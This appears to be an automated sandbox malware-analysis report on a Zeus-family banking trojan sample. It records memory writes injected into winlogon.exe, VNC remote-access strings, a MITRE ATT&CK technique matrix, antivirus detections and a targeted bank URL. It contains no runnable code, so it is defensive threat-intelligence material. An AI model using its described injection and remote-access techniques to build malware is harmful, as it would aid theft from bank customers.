Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CED6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CED9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CEFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CF9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CFFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D001000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D016000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D019000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D01B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D021000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D036000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D039000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D03B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D041000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D056000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D059000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D05B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D061000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D076000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D079000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D07B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_00414AEA InitializeSecurityDescriptor,SetSecurityDescriptorDacl, 0_2_00414AEA
Source: P8jE8nmN7G.exe, 00000000.00000002.464571349.0000000000DB0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: P8jE8nmN7G.exe, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: P8jE8nmN7G.exe, 00000000.00000002.464571349.0000000000DB0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: P8jE8nmN7G.exe, 00000000.00000002.464571349.0000000000DB0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.196746478.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_0040B231 CreateNamedPipeW,CreateEventW,CreateEventW,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject, 0_2_0040B231
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_0040486E PFXImportCertStore,GetSystemTime,wnsprintfW,lstrcatW, 0_2_0040486E
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_0040B585 HeapCreate,GetProcessHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW, 0_2_0040B585
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_0040F1C9 GetTimeZoneInformation, 0_2_0040F1C9
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_00414BBB GetTickCount,GetVersionExW,GetUserDefaultUILanguage,GetModuleFileNameW, 0_2_00414BBB
Source: P8jE8nmN7G.exe, 00000000.00000002.465097863.00000000025DF000.00000004.00000040.sdmp Binary or memory string: zlclient.exe

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: P8jE8nmN7G.exe String found in binary or memory: RFB 003.003
Source: P8jE8nmN7G.exe String found in binary or memory: RFB 003.003
Source: P8jE8nmN7G.exe, 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp String found in binary or memory: A@dA@RFB 003.003
Source: winlogon.exe, 00000002.00000002.473149033.000000000E0E1000.00000040.00000001.sdmp String found in binary or memory: RFB 003.003
Source: winlogon.exe, 00000002.00000002.463379411.0000000000401000.00000040.00000001.sdmp String found in binary or memory: A@dA@RFB 003.003
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_0041090B socket,bind,closesocket, 0_2_0041090B
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe Code function: 0_2_004105F2 socket,bind,listen,closesocket, 0_2_004105F2

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts1 | Native API1 | DLL Side-Loading1 | DLL Side-Loading1 | Obfuscated Files or Information2 | Input Capture21 | System Time Discovery2 | Remote Desktop Protocol1 | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1 |
| Default Accounts | Scheduled Task/Job | Application Shimming1 | Application Shimming1 | Install Root Certificate1 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Input Capture21 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Create Account1 | Valid Accounts1 | Software Packing13 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Remote Access Software1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Valid Accounts1 | Access Token Manipulation11 | DLL Side-Loading1 | NTDS | System Information Discovery3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Registry Run Keys / Startup Folder1 | Process Injection42 | Masquerading2 | LSA Secrets | Security Software Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Registry Run Keys / Startup Folder1 | Valid Accounts1 | Cached Domain Credentials | Virtualization/Sandbox Evasion1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion1 | DCSync | Process Discovery3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation11 | Proc Filesystem | System Owner/User Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection42 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

Behavior Graph

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| P8jE8nmN7G.exe | 80% | Virustotal | |
| P8jE8nmN7G.exe | 96% | ReversingLabs | Win32.Trojan.Zeus |
| P8jE8nmN7G.exe | 100% | Avira | TR/Dropper.Gen |
| P8jE8nmN7G.exe | 100% | Joe Sandbox ML | |

Dropped Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Windows\SysWOW64\sdra64.exe | 100% | Avira | TR/Dropper.Gen |
| C:\Windows\SysWOW64\sdra64.exe | 100% | Joe Sandbox ML | |

Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 2.2.winlogon.exe.d6a0000.108.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d1a0000.68.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 0.1.P8jE8nmN7G.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3 |
| 2.2.winlogon.exe.d8a0000.124.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 0.2.P8jE8nmN7G.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.fa60000.394.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.10760000.498.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d740000.113.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f440000.345.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d1c0000.69.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.10800000.503.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.eaa0000.268.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e060000.186.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.fae0000.398.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.100c0000.445.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.dfa0000.180.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f260000.330.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e5e0000.230.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e480000.219.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.fa40000.393.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.dfe0000.182.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.fa80000.395.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.106c0000.493.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e660000.234.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e7c0000.245.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.ed20000.288.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f920000.384.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.fd20000.416.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.ebe0000.278.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d5a0000.100.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.fb80000.403.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.efa0000.308.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d2e0000.78.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f420000.344.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f540000.353.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f580000.355.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e7e0000.246.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.c960000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e360000.210.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d960000.130.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.10160000.450.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e6e0000.238.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f9e0000.390.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.f9a0000.388.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.db00000.143.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.eac0000.269.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.cfe0000.54.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.ce40000.41.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.10620000.488.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d040000.57.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.e9a0000.260.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.10960000.514.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.ca00000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.102c0000.461.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d880000.123.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.cbc0000.21.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.10720000.496.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 2.2.winlogon.exe.d7a0000.116.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
2.2.winlogon.exe.df20000.176.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efe0000.310.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10680000.491.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f1a0000.324.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f960000.386.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.103e0000.470.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ea40000.265.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cc80000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f720000.368.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dc40000.153.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cf60000.50.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10280000.459.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ec40000.281.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cea0000.44.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f2e0000.334.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e880000.251.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e3a0000.212.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca60000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10300000.463.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fbe0000.406.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f940000.385.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f240000.329.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.108e0000.510.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f400000.343.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e0e0000.190.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d140000.65.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cba0000.20.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.100e0000.446.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f5e0000.358.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10460000.474.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e720000.240.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e940000.257.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e620000.232.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fec0000.429.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fd00000.415.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d9a0000.132.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eb20000.272.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cb80000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d940000.129.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f460000.346.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.de00000.167.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

Source:https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Detection:0%
Scanner:Avira URL Cloud
Label:safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name:https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source:P8jE8nmN7G.exe, 00000000.00000002.464936104.0000000002563000.00000004.00000040.sdmp
Malicious:false
Antivirus Detection:
  • Avira URL Cloud: safe
Reputation:low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:409287
Start date:09.05.2021
Start time:20:35:16
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 6s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:P8jE8nmN7G (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.evad.winEXE@1/2@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 87.2% (good quality ratio 82.8%)
  • Quality average: 83.4%
  • Quality standard deviation: 27.7%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
